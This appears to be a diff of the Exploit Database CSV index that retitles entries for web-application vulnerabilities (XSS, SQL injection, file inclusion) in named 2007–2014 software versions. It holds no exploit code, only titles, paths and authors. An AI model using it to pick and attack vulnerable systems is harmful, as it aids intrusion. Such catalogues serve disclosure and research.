-30609,platforms/jsp/webapps/30609.txt,"JSPWiki 2.5.139 - edit.jsp edittime Parameter Cross-Site Scripting",2007-09-25,"Jason Kratzer",jsp,webapps,0 +30609,platforms/jsp/webapps/30609.txt,"JSPWiki 2.5.139 - 'edit.jsp?edittime' Cross-Site Scripting",2007-09-25,"Jason Kratzer",jsp,webapps,0 30610,platforms/jsp/webapps/30610.txt,"JSPWiki 2.5.139 - 'Comment.jsp' Multiple Cross-Site Scripting Vulnerabilities",2007-09-25,"Jason Kratzer",jsp,webapps,0 30611,platforms/jsp/webapps/30611.txt,"JSPWiki 2.5.139 - 'UserPreferences.jsp' Multiple Cross-Site Scripting Vulnerabilities",2007-09-25,"Jason Kratzer",jsp,webapps,0 30612,platforms/jsp/webapps/30612.txt,"JSPWiki 2.5.139 - 'Login.jsp' Multiple Cross-Site Scripting Vulnerabilities",2007-09-25,"Jason Kratzer",jsp,webapps,0 30613,platforms/jsp/webapps/30613.txt,"JSPWiki 2.5.139 - 'Diff.jsp' Multiple Cross-Site Scripting Vulnerabilities",2007-09-25,"Jason Kratzer",jsp,webapps,0 30614,platforms/php/webapps/30614.txt,"PHP-Nuke Dance Music Module - 'index.php' Local File Inclusion",2007-09-25,waraxe,php,webapps,0 -30615,platforms/php/webapps/30615.txt,"SimpGB 1.46.2 - 'admin/' Default URI l_username Parameter Cross-Site Scripting",2007-09-25,netVigilance,php,webapps,0 +30615,platforms/php/webapps/30615.txt,"SimpGB 1.46.2 - '/admin/?l_username' Cross-Site Scripting",2007-09-25,netVigilance,php,webapps,0 30616,platforms/php/webapps/30616.txt,"SimpGB 1.46.2 - '/admin/emoticonlist.php?l_emoticonlist' Cross-Site Scripting",2007-09-25,netVigilance,php,webapps,0 30617,platforms/php/webapps/30617.txt,"SimpNews 2.41.3 - 'l_username' Cross-Site Scripting",2007-09-25,"Jesper Jurcenoks",php,webapps,0 30618,platforms/php/webapps/30618.txt,"SimpNews 2.41.3 - 'backurl' Cross-Site Scripting",2007-09-25,"Jesper Jurcenoks",php,webapps,0 -30621,platforms/asp/webapps/30621.txt,"Novus 1.0 - Buscar.asp Cross-Site Scripting",2007-09-27,Zutr4,asp,webapps,0 +30621,platforms/asp/webapps/30621.txt,"Novus 1.0 - 'Buscar.asp' Cross-Site Scripting",2007-09-27,Zutr4,asp,webapps,0 30623,platforms/php/webapps/30623.pl,"MD-Pro 1.0.76 - 'index.php' Firefox ID SQL Injection",2007-09-29,"unidentified1_ is",php,webapps,0 30624,platforms/asp/webapps/30624.txt,"Netkamp Emlak Scripti - Multiple Input Validation Vulnerabilities",2007-10-01,GeFORC3,asp,webapps,0 30625,platforms/asp/webapps/30625.txt,"Ohesa Emlak Portal 1.0 - 'satilik.asp?Kategori' SQL Injection",2007-10-01,GeFORC3,asp,webapps,0 30626,platforms/asp/webapps/30626.txt,"Ohesa Emlak Portal 1.0 - 'detay.asp?Emlak' SQL Injection",2007-10-01,GeFORC3,asp,webapps,0 -30629,platforms/asp/webapps/30629.txt,"ASP Product Catalog 1.0 - default.asp SQL Injection",2007-10-01,joseph.giron13,asp,webapps,0 +30629,platforms/asp/webapps/30629.txt,"ASP Product Catalog 1.0 - 'default.asp' SQL Injection",2007-10-01,joseph.giron13,asp,webapps,0 30632,platforms/php/webapps/30632.txt,"DRBGuestbook 1.1.13 - 'index.php' Cross-Site Scripting",2007-10-03,Gokhan,php,webapps,0 30633,platforms/php/webapps/30633.txt,"Uebimiau Webmail 2.7.x - 'index.php' Cross-Site Scripting",2007-10-03,"Ivan Sanches",php,webapps,0 30634,platforms/php/webapps/30634.txt,"Content Builder 0.7.5 - 'postComment.php' Remote File Inclusion",2007-10-03,"Mehrad Ansari Targhi",php,webapps,0 @@ -32003,7 +32004,7 @@ id,file,description,date,author,platform,type,port 30968,platforms/php/webapps/30968.txt,"MODx 0.9.6.1 - 'htcmime.php' Source Code Information Disclosure",2008-01-02,"AmnPardaz Security Research Team",php,webapps,0 30639,platforms/cgi/webapps/30639.txt,"Cart32 6.x - GetImage Arbitrary File Download",2007-10-04,"Paul Craig",cgi,webapps,0 30640,platforms/php/webapps/30640.txt,"Stuffed Guys Stuffed Tracker - Multiple Cross-Site Scripting Vulnerabilities",2007-10-04,"Aria-Security Team",php,webapps,0 -30641,platforms/php/webapps/30641.txt,"AfterLogic MailBee WebMail Pro 3.x - 'login.php' mode Parameter Cross-Site Scripting",2007-10-05,"Ivan Sanchez",php,webapps,0 +30641,platforms/php/webapps/30641.txt,"AfterLogic MailBee WebMail Pro 3.x - 'login.php?mode' Cross-Site Scripting",2007-10-05,"Ivan Sanchez",php,webapps,0 30642,platforms/php/webapps/30642.txt,"AfterLogic MailBee WebMail Pro 3.x - 'default.asp?mode2' Cross-Site Scripting",2007-10-05,"Ivan Sanchez",php,webapps,0 30647,platforms/php/webapps/30647.txt,"SNewsCMS 2.1 - 'News_page.php' Cross-Site Scripting",2007-10-08,medconsultation.ru,php,webapps,0 30649,platforms/cgi/webapps/30649.txt,"NetWin DNews - 'Dnewsweb.exe' Multiple Cross-Site Scripting Vulnerabilities",2007-10-09,Doz,cgi,webapps,0 @@ -32030,12 +32031,12 @@ id,file,description,date,author,platform,type,port 31530,platforms/php/webapps/31530.txt,"Joomla! / Mambo Component Download3000 1.0 - 'id' SQL Injection",2008-03-23,S@BUN,php,webapps,0 31531,platforms/php/webapps/31531.pl,"Bomba Haber 2.0 - 'haberoku.php' SQL Injection",2008-03-25,cOndemned,php,webapps,0 30674,platforms/java/webapps/30674.txt,"Stringbeans Portal 3.2 Projects Script - Cross-Site Scripting",2007-10-15,JosS,java,webapps,0 -30675,platforms/jsp/webapps/30675.txt,"InnovaPortal - tc/contents/home001.jsp contentid Parameter Cross-Site Scripting",2007-10-15,JosS,jsp,webapps,0 -30676,platforms/jsp/webapps/30676.txt,"InnovaPortal - msg.jsp msg Parameter Cross-Site Scripting",2007-10-15,JosS,jsp,webapps,0 +30675,platforms/jsp/webapps/30675.txt,"InnovaPortal - 'tc/contents/home001.jsp?contentid' Cross-Site Scripting",2007-10-15,JosS,jsp,webapps,0 +30676,platforms/jsp/webapps/30676.txt,"InnovaPortal - 'msg.jsp?msg' Cross-Site Scripting",2007-10-15,JosS,jsp,webapps,0 30682,platforms/php/webapps/30682.txt,"SiteBar 3.3.8 - 'translator.php?dir' Traversal Arbitrary File Access",2007-10-18,"Robert Buchholz",php,webapps,0 -30683,platforms/php/webapps/30683.txt,"SiteBar 3.3.8 - '/translator.php upd/cmd/Action/edit' Arbitrary PHP Code Execution",2007-10-18,"Robert Buchholz",php,webapps,0 +30683,platforms/php/webapps/30683.txt,"SiteBar 3.3.8 - '/translator.php?upd/cmd/Action/edit' Arbitrary PHP Code Execution",2007-10-18,"Robert Buchholz",php,webapps,0 30684,platforms/php/webapps/30684.txt,"SiteBar 3.3.8 - 'integrator.php?lang' Cross-Site Scripting",2007-10-18,"Robert Buchholz",php,webapps,0 -30685,platforms/php/webapps/30685.txt,"SiteBar 3.3.8 - 'index.php' target Parameter Cross-Site Scripting",2007-10-18,"Robert Buchholz",php,webapps,0 +30685,platforms/php/webapps/30685.txt,"SiteBar 3.3.8 - 'index.php?target' Cross-Site Scripting",2007-10-18,"Robert Buchholz",php,webapps,0 30686,platforms/php/webapps/30686.txt,"SiteBar 3.3.8 - 'command.php?Modify User Action uid' Cross-Site Scripting",2007-10-18,"Robert Buchholz",php,webapps,0 30804,platforms/php/webapps/30804.txt,"VBTube 1.1 - Search Cross-Site Scripting",2007-11-24,Crackers_Child,php,webapps,0 30689,platforms/php/webapps/30689.php,"Taboada Macronews 1.0 - SQL Injection",2014-01-04,Jefrey,php,webapps,0 @@ -32046,33 +32047,33 @@ id,file,description,date,author,platform,type,port 30693,platforms/php/webapps/30693.txt,"SocketKB 1.1.5 - Multiple Cross-Site Scripting Vulnerabilities",2007-10-19,"Ivan Sanchez",php,webapps,0 30694,platforms/php/webapps/30694.txt,"Socketmail 2.2.1 - 'lostpwd.php' Cross-Site Scripting",2007-10-19,"Ivan Sanchez",php,webapps,0 30695,platforms/php/webapps/30695.txt,"rNote 0.9.7 - 'rnote.php' Multiple Cross-Site Scripting Vulnerabilities",2007-10-19,RoMaNcYxHaCkEr,php,webapps,0 -30696,platforms/asp/webapps/30696.txt,"SearchSimon Lite 1.0 - Filename.asp Cross-Site Scripting",2007-10-20,"Aria-Security Team",asp,webapps,0 +30696,platforms/asp/webapps/30696.txt,"SearchSimon Lite 1.0 - 'Filename.asp' Cross-Site Scripting",2007-10-20,"Aria-Security Team",asp,webapps,0 30697,platforms/php/webapps/30697.txt,"ReloadCMS 1.2.5 - 'index.php' Local File Inclusion",2007-10-20,sekuru,php,webapps,0 30698,platforms/php/webapps/30698.txt,"Flatnuke3 File Manager Module - Unauthorized Access",2007-10-22,KiNgOfThEwOrLd,php,webapps,0 30699,platforms/php/webapps/30699.txt,"Hackish 1.1 - 'Blocco.php' Cross-Site Scripting",2007-10-22,Matrix86,php,webapps,0 30700,platforms/php/webapps/30700.txt,"deeemm CMS (dmcms) 0.7 - 'index.php' SQL Injection",2007-10-22,"Aria-Security Team",php,webapps,0 30701,platforms/php/webapps/30701.txt,"Jeebles Technology Jeebles Directory 2.9.60 - 'download.php' Local File Inclusion",2007-10-22,hack2prison,php,webapps,0 30703,platforms/php/webapps/30703.txt,"Japanese PHP Gallery Hosting - Arbitrary File Upload",2007-10-23,"Pete Houston",php,webapps,0 -30704,platforms/jsp/webapps/30704.txt,"Korean GHBoard FlashUpload Component - download.jsp name Parameter Arbitrary File Access",2007-10-23,Xcross87,jsp,webapps,0 +30704,platforms/jsp/webapps/30704.txt,"Korean GHBoard FlashUpload Component - 'download.jsp?name' Arbitrary File Access",2007-10-23,Xcross87,jsp,webapps,0 30705,platforms/jsp/webapps/30705.txt,"Korean GHBoard - Component/upload.jsp Unspecified Arbitrary File Upload",2007-10-23,Xcross87,jsp,webapps,0 -30706,platforms/asp/webapps/30706.txt,"CodeWidgets Web Based Alpha Tabbed Address Book - index.asp SQL Injection",2007-10-24,"Aria-Security Team",asp,webapps,0 +30706,platforms/asp/webapps/30706.txt,"CodeWidgets Web Based Alpha Tabbed Address Book - 'index.asp' SQL Injection",2007-10-24,"Aria-Security Team",asp,webapps,0 30707,platforms/php/webapps/30707.txt,"PHPbasic basicFramework 1.0 - 'Includes.php' Remote File Inclusion",2007-10-24,Alucar,php,webapps,0 -30708,platforms/asp/webapps/30708.txt,"Aleris Web Publishing Server 3.0 - Page.asp SQL Injection",2007-10-25,joseph.giron13,asp,webapps,0 +30708,platforms/asp/webapps/30708.txt,"Aleris Web Publishing Server 3.0 - 'Page.asp' SQL Injection",2007-10-25,joseph.giron13,asp,webapps,0 30712,platforms/php/webapps/30712.txt,"Multi-Forums - 'Directory.php' Multiple SQL Injections",2007-10-25,KiNgOfThEwOrLd,php,webapps,0 30715,platforms/php/webapps/30715.txt,"WordPress 2.3 - 'Edit-Post-Rows.php' Cross-Site Scripting",2007-10-29,waraxe,php,webapps,0 30716,platforms/php/webapps/30716.txt,"Smart-Shop - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-10-29,Doz,php,webapps,0 30717,platforms/php/webapps/30717.txt,"Omnistar Live - 'KB.php' Cross-Site Scripting",2007-10-29,Doz,php,webapps,0 30718,platforms/php/webapps/30718.txt,"Saxon 5.4 - 'Menu.php' Cross-Site Scripting",2007-10-29,netVigilance,php,webapps,0 30719,platforms/php/webapps/30719.txt,"Saxon 5.4 - 'Example.php' SQL Injection",2007-10-29,netVigilance,php,webapps,0 -30806,platforms/php/webapps/30806.txt,"PHPSlideShow 0.9.9 - Directory Parameter Cross-Site Scripting",2007-11-26,"Jose Luis Gongora Fernandez",php,webapps,0 -30807,platforms/asp/webapps/30807.txt,"GOUAE DWD Realty - Password Parameters SQL Injection",2007-11-26,"Aria-Security Team",asp,webapps,0 +30806,platforms/php/webapps/30806.txt,"PHPSlideShow 0.9.9 - 'Directory' Cross-Site Scripting",2007-11-26,"Jose Luis Gongora Fernandez",php,webapps,0 +30807,platforms/asp/webapps/30807.txt,"GOUAE DWD Realty - 'Password' SQL Injection",2007-11-26,"Aria-Security Team",asp,webapps,0 30808,platforms/cgi/webapps/30808.txt,"GWExtranet 3.0 - 'Scp.dll' Multiple HTML Injection Vulnerabilities",2007-11-26,Doz,cgi,webapps,0 30723,platforms/hardware/webapps/30723.php,"Seagate BlackArmor NAS - Root Exploit",2014-01-06,"Jeroen - IT Nerdbox",hardware,webapps,0 30725,platforms/hardware/webapps/30725.txt,"Seagate BlackArmor NAS sg2000-2000.1331 - Remote Command Execution",2014-01-06,"Jeroen - IT Nerdbox",hardware,webapps,0 30726,platforms/hardware/webapps/30726.txt,"Seagate BlackArmor NAS sg2000-2000.1331 - Cross-Site Request Forgery",2014-01-06,"Jeroen - IT Nerdbox",hardware,webapps,0 30727,platforms/hardware/webapps/30727.txt,"Seagate BlackArmor NAS sg2000-2000.1331 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2014-01-06,"Jeroen - IT Nerdbox",hardware,webapps,0 30731,platforms/php/webapps/30731.txt,"Synergiser 1.2 - 'index.php' Local File Inclusion",2007-11-01,KiNgOfThEwOrLd,php,webapps,0 -30732,platforms/php/webapps/30732.txt,"CONTENTCustomizer 3.1 - Dialog.php Information Disclosure",2007-11-01,d3hydr8,php,webapps,0 +30732,platforms/php/webapps/30732.txt,"CONTENTCustomizer 3.1 - 'Dialog.php' Information Disclosure",2007-11-01,d3hydr8,php,webapps,0 30733,platforms/php/webapps/30733.txt,"phpMyAdmin 2.11.1 - 'Server_Status.php' Cross-Site Scripting",2007-10-17,"Omer Singer",php,webapps,0 30734,platforms/php/webapps/30734.txt,"Helios Calendar 1.1/1.2 - 'admin/index.php' Cross-Site Scripting",2007-11-02,"Ivan Sanchez",php,webapps,0 30735,platforms/php/webapps/30735.txt,"PHP Helpdesk 0.6.16 - 'index.php' Local File Inclusion",2007-11-03,joseph.giron13,php,webapps,0 @@ -32080,7 +32081,7 @@ id,file,description,date,author,platform,type,port 30738,platforms/php/webapps/30738.txt,"E-Vendejo 0.2 - 'Articles.php' SQL Injection",2007-11-05,r00t,php,webapps,0 30739,platforms/php/webapps/30739.txt,"JLMForo System - 'Buscado.php' Cross-Site Scripting",2007-11-05,"Jose Luis Gongora Fernandez",php,webapps,0 30741,platforms/php/webapps/30741.txt,"easyGB 2.1.1 - 'index.php' Local File Inclusion",2007-11-05,"BorN To K!LL",php,webapps,0 -30743,platforms/asp/webapps/30743.txt,"i-Gallery 3.4 - igallery.asp Remote Information Disclosure",2007-11-05,hackerbinhphuoc,asp,webapps,0 +30743,platforms/asp/webapps/30743.txt,"i-Gallery 3.4 - 'igallery.asp' Remote Information Disclosure",2007-11-05,hackerbinhphuoc,asp,webapps,0 30745,platforms/php/webapps/30745.html,"Weblord.it MS-TopSites - Unauthorized Access / HTML Injection",2007-11-06,0x90,php,webapps,0 30746,platforms/php/webapps/30746.txt,"Computer Associates SiteMinder - Web Agent Smpwservices.FCC Cross-Site Scripting",2007-11-07,"Giuseppe Gottardi",php,webapps,0 30747,platforms/asp/webapps/30747.txt,"Rapid Classified - 'AgencyCatResult.asp' SQL Injection",2007-11-08,The-0utl4w,asp,webapps,0 @@ -32090,9 +32091,9 @@ id,file,description,date,author,platform,type,port 30754,platforms/php/webapps/30754.txt,"AutoIndex PHP Script 2.2.2 - 'PHP_SELF index.php' Cross-Site Scripting",2007-08-27,L4teral,php,webapps,0 30757,platforms/php/webapps/30757.txt,"X7 Chat 2.0.4 - 'frame.php' Cross-Site Scripting",2007-11-12,ShAy6oOoN,php,webapps,0 30758,platforms/php/webapps/30758.txt,"X7 Chat 2.0.4 - 'upgradev1.php' Cross-Site Scripting",2007-11-12,ShAy6oOoN,php,webapps,0 -30759,platforms/cgi/webapps/30759.txt,"VTLS Web Gateway 48.1 - Searchtype Parameter Cross-Site Scripting",2007-11-13,"Jesus Olmos Gonzalez",cgi,webapps,0 +30759,platforms/cgi/webapps/30759.txt,"VTLS Web Gateway 48.1 - 'Searchtype' Cross-Site Scripting",2007-11-13,"Jesus Olmos Gonzalez",cgi,webapps,0 30762,platforms/php/webapps/30762.txt,"WordPress Plugin WP-SlimStat 0.9.2 - Cross-Site Scripting",2007-11-13,"Fracesco Vaj",php,webapps,0 -30764,platforms/php/webapps/30764.txt,"CONTENTCustomizer 3.1 - Dialog.php Unauthorized Access",2007-11-14,d3hydr8,php,webapps,0 +30764,platforms/php/webapps/30764.txt,"CONTENTCustomizer 3.1 - 'Dialog.php' Unauthorized Access",2007-11-14,d3hydr8,php,webapps,0 30770,platforms/cgi/webapps/30770.txt,"AIDA Web - Frame.HTML Multiple Unauthorized Access Vulnerabilities",2007-11-14,"MC Iglo",cgi,webapps,0 30774,platforms/php/webapps/30774.txt,"Liferay Portal 4.1 Login Script - Cross-Site Scripting",2007-11-16,"Adrian Pastor",php,webapps,0 30775,platforms/asp/webapps/30775.txt,"JiRo's Banner System 2.0 - 'login.asp' Multiple SQL Injections",2007-11-17,"Aria-Security Team",asp,webapps,0 @@ -32100,12 +32101,12 @@ id,file,description,date,author,platform,type,port 30778,platforms/asp/webapps/30778.txt,"Click&BaneX - 'Details.asp' SQL Injection",2007-11-19,"Aria-Security Team",asp,webapps,0 30975,platforms/cgi/webapps/30975.txt,"W3-mSQL - Error Page Cross-Site Scripting",2008-01-03,vivek_infosec,cgi,webapps,0 30976,platforms/php/webapps/30976.txt,"MyPHP Forum 3.0 - 'search.php' Multiple Unspecified SQL Injections",2008-01-03,The:Paradox,php,webapps,0 -30977,platforms/php/webapps/30977.txt,"WordPress 2.2.3 - '/wp-admin/post.php' popuptitle Parameter Cross-Site Scripting",2008-01-03,3APA3A,php,webapps,0 +30977,platforms/php/webapps/30977.txt,"WordPress 2.2.3 - '/wp-admin/post.php?popuptitle' Cross-Site Scripting",2008-01-03,3APA3A,php,webapps,0 30786,platforms/php/webapps/30786.txt,"Middle School Homework Page 1.3 Beta 1 - Multiple Vulnerabilities",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,80 30790,platforms/php/webapps/30790.txt,"Cubic CMS - Multiple Vulnerabilities",2014-01-07,"Eugenio Delfa",php,webapps,80 30811,platforms/php/webapps/30811.txt,"SimpleGallery 0.1.3 - 'index.php' Cross-Site Scripting",2007-11-26,JosS,php,webapps,0 30813,platforms/php/webapps/30813.txt,"FMDeluxe 2.1 - 'index.php' Cross-Site Scripting",2007-11-26,JosS,php,webapps,0 -30815,platforms/php/webapps/30815.txt,"Tilde 4.0 - Aarstal Parameter Cross-Site Scripting",2007-11-26,KiNgOfThEwOrLd,php,webapps,0 +30815,platforms/php/webapps/30815.txt,"Tilde 4.0 - 'Aarstal' Cross-Site Scripting",2007-11-26,KiNgOfThEwOrLd,php,webapps,0 30817,platforms/php/webapps/30817.html,"Liferay Portal 4.3.1 - Forgot-Password Cross-Site Scripting",2007-11-27,"Joshua Morin",php,webapps,0 30818,platforms/cgi/webapps/30818.txt,"ht://Dig 3.2 - Htsearch Cross-Site Scripting",2007-11-27,"Michael Skibbe",cgi,webapps,0 30820,platforms/php/webapps/30820.txt,"p.mapper 3.2 beta3 - '/incPHP/globals.php?_SESSION[PM_INCPHP]' Remote File Inclusion",2007-11-27,ShAy6oOoN,php,webapps,0 @@ -32125,14 +32126,14 @@ id,file,description,date,author,platform,type,port 30843,platforms/asp/webapps/30843.txt,"Absolute News Manager .NET 5.1 - 'xlaabsolutenm.aspx?rmore' Cross-Site Scripting",2007-12-04,"Adrian Pastor",asp,webapps,0 30844,platforms/asp/webapps/30844.txt,"Absolute News Manager .NET 5.1 - '/pages/default.aspx?template' Cross-Site Scripting",2007-12-04,"Adrian Pastor",asp,webapps,0 30845,platforms/asp/webapps/30845.txt,"Absolute News Manager .NET 5.1 - 'getpath.aspx' Direct Request Error Message Information",2007-12-04,"Adrian Pastor",asp,webapps,0 -30846,platforms/php/webapps/30846.txt,"phpMyChat 0.14.5 - chat/deluser.php3 LIMIT Parameter Cross-Site Scripting",2007-12-04,beenudel1986,php,webapps,0 +30846,platforms/php/webapps/30846.txt,"phpMyChat 0.14.5 - 'chat/deluser.php3?LIMIT' Cross-Site Scripting",2007-12-04,beenudel1986,php,webapps,0 30847,platforms/php/webapps/30847.txt,"phpMyChat 0.14.5 - '/chat/users_popupL.php3' Multiple Cross-Site Scripting Vulnerabilities",2007-12-04,beenudel1986,php,webapps,0 30848,platforms/php/webapps/30848.txt,"Joomla! Component Content 1.5 RC3 - 'view' SQL Injection",2007-12-05,beenudel1986,php,webapps,0 30849,platforms/php/webapps/30849.txt,"Joomla! Component com_search 1.5 RC3 - 'index.php' Multiple SQL Injections",2007-12-05,beenudel1986,php,webapps,0 30851,platforms/php/webapps/30851.txt,"VisualShapers EZContents 1.4.5 - File Disclosure",2007-12-05,p4imi0,php,webapps,0 30852,platforms/php/webapps/30852.txt,"Kayako SupportSuite 3.0.32 - PHP_SELF Trigger_Error Function Cross-Site Scripting",2007-12-06,imei,php,webapps,0 30853,platforms/php/webapps/30853.txt,"OpenNewsletter 2.5 - 'Compose.php' Cross-Site Scripting",2007-12-06,Manu,php,webapps,0 -30854,platforms/php/webapps/30854.sh,"wwwstats 3.21 - Clickstats.php Multiple HTML Injection Vulnerabilities",2007-12-15,"Jesus Olmos Gonzalez",php,webapps,0 +30854,platforms/php/webapps/30854.sh,"wwwstats 3.21 - 'Clickstats.php' Multiple HTML Injection Vulnerabilities",2007-12-15,"Jesus Olmos Gonzalez",php,webapps,0 30855,platforms/asp/webapps/30855.txt,"WebDoc 3.0 - Multiple SQL Injections",2007-12-07,Chrysalid,asp,webapps,0 30857,platforms/php/webapps/30857.txt,"webSPELL 4.1.2 - 'usergallery.php?galleryID' Cross-Site Scripting",2007-12-10,Brainhead,php,webapps,0 30858,platforms/php/webapps/30858.txt,"webSPELL 4.1.2 - 'calendar.php' Multiple Cross-Site Scripting Vulnerabilities",2007-12-10,Brainhead,php,webapps,0 @@ -32163,14 +32164,14 @@ id,file,description,date,author,platform,type,port 30918,platforms/php/webapps/30918.txt,"iDevSpot iSupport 1.8 - 'index.php' Local File Inclusion",2007-12-20,JuMp-Er,php,webapps,0 30919,platforms/cgi/webapps/30919.txt,"SiteScape Forum - 'dispatch.cgi' Tcl Command Injection",2007-12-20,niekt0,cgi,webapps,0 30921,platforms/php/webapps/30921.txt,"MRBS 1.2.x - 'view_entry.php' SQL Injection",2007-12-21,root@hanicker.it,php,webapps,0 -30923,platforms/php/webapps/30923.txt,"MyBlog 1.x - 'Games.php ID' Remote File Inclusion",2007-12-22,"Beenu Arora",php,webapps,0 +30923,platforms/php/webapps/30923.txt,"MyBlog 1.x - 'Games.php?ID' Remote File Inclusion",2007-12-22,"Beenu Arora",php,webapps,0 30924,platforms/php/webapps/30924.txt,"Dokeos 1.x - '/forum/viewthread.php?forum' Cross-Site Scripting",2007-12-22,Doz,php,webapps,0 30925,platforms/php/webapps/30925.txt,"Dokeos 1.x - '/forum/viewforum.php?forum' Cross-Site Scripting",2007-12-22,Doz,php,webapps,0 30926,platforms/php/webapps/30926.txt,"Dokeos 1.x - '/work/work.php?display_upload_form Action origin' Cross-Site Scripting",2007-12-22,Doz,php,webapps,0 30927,platforms/php/webapps/30927.txt,"Agares Media ThemeSiteScript 1.0 - 'loadadminpage' Remote File Inclusion",2007-12-24,Koller,php,webapps,0 30929,platforms/php/webapps/30929.txt,"Logaholic - 'update.php?page' SQL Injection",2007-12-24,malibu.r,php,webapps,0 30930,platforms/php/webapps/30930.txt,"Logaholic - 'index.php' SQL Injection",2007-12-24,malibu.r,php,webapps,0 -30931,platforms/php/webapps/30931.txt,"Logaholic - 'index.php' conf Parameter Cross-Site Scripting",2007-12-24,malibu.r,php,webapps,0 +30931,platforms/php/webapps/30931.txt,"Logaholic - 'index.php?conf' Cross-Site Scripting",2007-12-24,malibu.r,php,webapps,0 30932,platforms/php/webapps/30932.txt,"Logaholic - 'profiles.php?newconfname' Cross-Site Scripting",2007-12-24,malibu.r,php,webapps,0 30937,platforms/php/webapps/30937.txt,"Limbo CMS 1.0.4 - 'com_option' Cross-Site Scripting",2007-12-25,"Omer Singer",php,webapps,0 30938,platforms/asp/webapps/30938.txt,"Web Sihirbazi 5.1.1 - 'default.asp' Multiple SQL Injections",2007-12-24,bypass,asp,webapps,0 @@ -32198,7 +32199,7 @@ id,file,description,date,author,platform,type,port 30965,platforms/php/webapps/30965.txt,"LiveCart 1.0.1 - 'q' Cross-Site Scripting",2007-12-31,Doz,php,webapps,0 30966,platforms/php/webapps/30966.txt,"LiveCart 1.0.1 - 'return' Cross-Site Scripting (2)",2007-12-31,Doz,php,webapps,0 30967,platforms/php/webapps/30967.txt,"LiveCart 1.0.1 - 'email' Cross-Site Scripting",2007-12-31,Doz,php,webapps,0 -30979,platforms/php/webapps/30979.txt,"WordPress 2.2.3 - '/wp-admin/edit.php' backup Parameter Cross-Site Scripting",2008-01-03,3APA3A,php,webapps,0 +30979,platforms/php/webapps/30979.txt,"WordPress 2.2.3 - '/wp-admin/edit.php?backup' Cross-Site Scripting",2008-01-03,3APA3A,php,webapps,0 30980,platforms/php/webapps/30980.txt,"AwesomeTemplateEngine 1 - Multiple Cross-Site Scripting Vulnerabilities",2008-01-03,MustLive,php,webapps,0 30981,platforms/php/webapps/30981.txt,"PRO-Search 0.17 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-01-03,MustLive,php,webapps,0 30982,platforms/php/webapps/30982.html,"Nucleus CMS 3.0.1 - 'myid' SQL Injection",2008-01-03,MustLive,php,webapps,0 @@ -32209,7 +32210,7 @@ id,file,description,date,author,platform,type,port 30988,platforms/php/webapps/30988.txt,"Rotabanner Local 2/3 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-01-03,MustLive,php,webapps,0 30992,platforms/php/webapps/30992.txt,"Strawberry 1.1.1 - 'html.php' Remote Code Execution",2008-01-07,"Eugene Minaev",php,webapps,0 30993,platforms/asp/webapps/30993.txt,"Snitz Forums 2000 3.4.5/3.4.6 - Multiple Cross-Site Scripting Vulnerabilities",2008-01-07,Doz,asp,webapps,0 -30994,platforms/php/webapps/30994.html,"eTicket 1.5.5.2 - admin.php Cross-Site Request Forgery",2008-01-07,L4teral,php,webapps,0 +30994,platforms/php/webapps/30994.html,"eTicket 1.5.5.2 - 'admin.php' Cross-Site Request Forgery",2008-01-07,L4teral,php,webapps,0 30995,platforms/php/webapps/30995.txt,"eTicket 1.5.5.2 - 'view.php?s' Cross-Site Scripting",2008-01-07,L4teral,php,webapps,0 30996,platforms/php/webapps/30996.txt,"eTicket 1.5.5.2 - 'search.php' Multiple SQL Injections",2008-01-07,L4teral,php,webapps,0 30997,platforms/php/webapps/30997.txt,"eTicket 1.5.5.2 - 'admin.php' Multiple SQL Injections",2008-01-07,L4teral,php,webapps,0 @@ -32231,7 +32232,7 @@ id,file,description,date,author,platform,type,port 31034,platforms/php/webapps/31034.txt,"MyBB 1.2.10 - 'moderation.php' Multiple SQL Injections",2008-01-16,waraxe,php,webapps,0 31035,platforms/php/webapps/31035.txt,"Clever Copy 3.0 - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2008-01-17,hadihadi,php,webapps,0 31037,platforms/php/webapps/31037.txt,"phpAutoVideo 2.21 - 'sidebar.php?loadpage' Remote File Inclusion",2008-01-18,"H-T Team",php,webapps,0 -31038,platforms/php/webapps/31038.txt,"phpAutoVideo 2.21 - 'index.php' cat Parameter Cross-Site Scripting",2008-01-18,"H-T Team",php,webapps,0 +31038,platforms/php/webapps/31038.txt,"phpAutoVideo 2.21 - 'index.php?cat' Cross-Site Scripting",2008-01-18,"H-T Team",php,webapps,0 31041,platforms/php/webapps/31041.txt,"BloofoxCMS 0.3 - Multiple Input Validation Vulnerabilities",2008-01-20,AmnPardaz,php,webapps,0 31042,platforms/asp/webapps/31042.txt,"MegaBBS 1.5.14b - 'upload.asp' Cross-Site Scripting",2008-01-21,Doz,asp,webapps,0 31043,platforms/cgi/webapps/31043.txt,"Alice Gate2 Plus Wi-Fi Router - Cross-Site Request Forgery",2008-01-21,WarGame,cgi,webapps,0 @@ -32300,7 +32301,7 @@ id,file,description,date,author,platform,type,port 31142,platforms/php/webapps/31142.txt,"Simple E-document 1.31 - Login Bypass",2014-01-23,vinicius777,php,webapps,0 31143,platforms/php/webapps/31143.txt,"PizzaInn_Project - SQL Injection",2014-01-23,vinicius777,php,webapps,0 31144,platforms/php/webapps/31144.txt,"mySeatXT 0.2134 - SQL Injection",2014-01-23,vinicius777,php,webapps,0 -31145,platforms/php/webapps/31145.txt,"Easy POS System - SQL Injection (login.php)",2014-01-23,vinicius777,php,webapps,0 +31145,platforms/php/webapps/31145.txt,"Easy POS System - 'login.php' SQL Injection",2014-01-23,vinicius777,php,webapps,0 31146,platforms/php/webapps/31146.txt,"Cells Blog 3.3 - Reflected Cross-Site Scripting / Blind SQLite Injection",2014-01-23,vinicius777,php,webapps,0 31147,platforms/php/webapps/31147.txt,"Adult WebMaster PHP - Password Disclosure",2014-01-23,vinicius777,php,webapps,0 31154,platforms/php/webapps/31154.txt,"Counter Strike Portals - 'download' SQL Injection",2008-02-12,S@BUN,php,webapps,0 @@ -32329,15 +32330,15 @@ id,file,description,date,author,platform,type,port 31269,platforms/php/webapps/31269.txt,"Spyce 2.1.3 - '/spyce/examples/formtag.spy' Multiple Cross-Site Scripting Vulnerabilities",2007-02-19,"Richard Brain",php,webapps,0 31270,platforms/php/webapps/31270.txt,"Spyce 2.1.3 - spyce/examples/automaton.spy Direct Request Error Message Information Disclosure",2007-02-19,"Richard Brain",php,webapps,0 